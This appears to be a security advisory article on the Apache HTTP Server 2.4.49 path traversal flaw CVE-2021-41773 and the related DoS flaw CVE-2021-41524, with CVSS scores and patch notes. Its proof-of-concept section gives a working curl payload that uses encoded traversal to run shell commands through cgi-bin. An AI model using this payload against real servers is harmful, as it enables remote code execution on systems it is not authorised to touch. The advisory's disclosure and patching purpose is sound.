Zero-Day Path Traversal Vulnerability in Apache (CVE-2021-41773)

Zero-Day Path Traversal Vulnerability in Apache (CVE-2021-41773)

The Apache Software Foundation has announced a new update to patch 2 new vulnerabilities, one of which is a zero-day actively exploited in the wild.

Overview

The Apache Software Foundation has announced a new update to patch 2 new vulnerabilities that exist in the Apache HTTP Server. One of the patched flaws is a zero-day path traversal vulnerability (CVE-2021-41773) that is known to be exploited in the wild.

Description

The first vulnerability with the CVE identifier CVE-2021-41773 is a path traversal flaw that exists in Apache HTTP Server 2.4.49. Due to the vulnerability, an attacker could conduct a path traversal attack that maps URLs to files outside the expected document root, unless the document root is protected by “require all denied”. The vulnerability could also allow attackers to leak the source of interpreted files like CGI scripts.

Note that this vulnerability was introduced in version 2.4.49, i.e., earlier versions are not affected from it. This vulnerability needs to be patched immediately as it is known to be exploited in the wild.

The second vulnerability with the CVE identifier CVE-2021-41524 is a less critical null pointer dereference issue that affects only Apache HTTP Server 2.4.49. Due to the vulnerability, an adversary could conduct Denial of Service (DoS) attacks on the web server via specially crafted requests. Apache Project notes that there is currently no known exploit for the vulnerability.

Proof of Concept (PoC) Exploit

A PoC exploit of the CVE-2021-41773 that runs the id command on a Linux server is as follows:

$ curl 'http://ip-address:port/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'
uid=1(daemon) gid=1(daemon) groups=1(daemon)

Impact

An attacker who successfully exploits the CVE-2021-41773 by mapping URLs to files outside the expected document root, can read arbitrary files from the web server.

Impact Summary CVE-2021-41773

Category: Path Traversal
CVSS 3.1 Base Score: 7.5 High
CVSS 3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

An attacker who successfully exploits the CVE-2021-41524 by crafting special requests can cause DoS issues at the web server.

Impact Summary CVE-2021-41524

Category: Null Pointer Dereference
CVSS 3.1 Base Score: 7.5 High
CVSS 3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Solution (Update)

To defend against possible attacks due to these vulnerabilities, Apache HTTP Server version 2.4.50 was released. However, the fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.

Quote by Edsger Dijkstra
Quote by Edsger Dijkstra

If debugging is the process of removing software bugs, then programming must be the process of putting them in.

Edsger Dijkstra

Read more educational and inspirational cyber quotes at our page 100+ Best Cyber Security & Hacker Quotes.

References to Advisories, Solutions and Tools

To learn more about security vulnerabilities, you could also read our articles What is a Security Vulnerability? or What is Vulnerability Scanning?